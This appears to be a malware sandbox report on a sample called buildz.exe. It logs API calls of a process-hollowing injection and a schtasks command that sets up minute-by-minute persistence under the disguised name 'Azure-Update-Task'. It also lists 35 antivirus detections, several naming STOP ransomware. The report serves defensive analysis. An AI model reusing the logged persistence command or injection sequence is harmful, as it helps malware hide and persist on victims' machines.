NtUnmapViewOfSection April 21, 2023, 5:57 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2932 process_handle: 0x000000a8	1	0
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2932 region_size: 442368 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000a8	1	0
WriteProcessMemory April 21, 2023, 5:57 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2932 process_handle: 0x000000a8	1	1
NtSetContextThread April 21, 2023, 5:57 p.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4381549 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000a4 process_identifier: 2932	1	0
NtResumeThread April 21, 2023, 5:57 p.m.	thread_handle: 0x000000a4 suspend_count: 1 process_identifier: 2932	1	0
CreateProcessInternalW April 21, 2023, 5:57 p.m.	thread_identifier: 3056 thread_handle: 0x000000ac process_identifier: 3052 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Bkav	W32.AIDetect.malware1
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Babar.194990
FireEye	Generic.mg.2649cbcef1838339
CAT-QuickHeal	Ransom.Stop.P5
Cylance	unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 005a23a61 )
K7GW	Trojan ( 005a23a61 )
CrowdStrike	win/malicious_confidence_100% (W)
Cyren	W32/Kryptik.JPQ.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
APEX	Malicious
ClamAV	Win.Packer.pkr_ce1a-9980177-0
Kaspersky	UDS:Trojan-Ransom.Win32.Stop.gen
BitDefender	Gen:Variant.Babar.194990
Avast	RansomX-gen [Ransom]
McAfee-GW-Edition	BehavesLike.Win32.Lockbit.bc
Trapmine	malicious.high.ml.score
Sophos	ML/PE-A
SentinelOne	Static AI - Malicious PE
Google	Detected
MAX	malware (ai score=81)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	UDS:Trojan-Ransom.Win32.Stop.gen
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.R572924
Acronis	suspicious
VBA32	Trojan.Buzus
Malwarebytes	MachineLearning/Anomalous.95%
Rising	Trojan.Generic@AI.95 (RDML:bErCcEhhxqsr9l/TKXQXXg)
MaxSecure	Trojan.Malware.300983.susgen
AVG	RansomX-gen [Ransom]
DeepInstinct	MALICIOUS

buildz.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All